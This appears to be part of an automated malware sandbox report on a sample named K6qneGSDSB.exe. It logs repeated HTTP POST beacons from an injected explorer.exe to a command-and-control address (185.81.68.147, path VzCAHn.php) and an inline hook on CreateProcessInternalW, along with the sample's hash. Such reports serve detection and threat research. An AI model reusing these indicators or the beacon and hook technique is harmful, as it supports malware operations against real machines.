                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        44192.168.2.549911185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.562988043 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.682809114 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.009622097 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:30 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        45192.168.2.549917185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.234860897 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.355340004 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:32.905642033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:31 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        46192.168.2.549923185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.141158104 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.261368036 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:34.599256992 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:33 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        47192.168.2.549924185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:34.831712008 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:34.951719999 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:36.432595968 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:35 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        48192.168.2.549930185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:36.656960964 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:36.853092909 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:38.294503927 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:37 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        49192.168.2.549936185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:38.531939983 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:38.651813984 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:40.155792952 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:39 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        50192.168.2.549937185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:40.391685963 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:40.511718035 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:41.897562981 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:41 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        51192.168.2.549943185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:42.125504971 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:42.245377064 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:43.557998896 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:42 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        52192.168.2.549949185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:43.781451941 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:43.901422024 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:45.221307993 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:44 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        53192.168.2.549951185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:45.454060078 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:45.574320078 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:46.937748909 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:46 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        54192.168.2.549956185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:47.172399044 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:47.292593956 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:48.603566885 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:47 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        55192.168.2.549960185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:48.830661058 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:48.950720072 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:50.454200983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:49 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        56192.168.2.549965185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:50.687758923 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:50.807625055 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:52.135210037 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:51 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        57192.168.2.549970185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:52.359910011 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:52.479888916 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:53.978038073 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:53 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        58192.168.2.549975185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.204077005 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.324280977 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.660036087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:54 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        59192.168.2.549978185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.890947104 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:56.010875940 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.339330912 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:56 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        60192.168.2.549983185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.757472038 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.877573967 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.196631908 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:58 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        61192.168.2.549989185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.422288895 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.542449951 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.251880884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:14:00 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        62192.168.2.549995185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.486850977 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.610707045 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:14:03.092776060 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:14:02 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                        User Modules

                                                                                                                                                                                                                        Hook Summary

                                                                                                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                                                                                                        CreateProcessInternalWINLINEexplorer.exe

                                                                                                                                                                                                                        Processes

                                                                                                                                                                                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                                                                                        CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5F

                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:03:11:56
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\K6qneGSDSB.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff79cd60000
                                                                                                                                                                                                                        File size:2'672'128 bytes
                                                                                                                                                                                                                        MD5 hash:52C82F6CEB8CF41DE8A4C01B313E3712
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
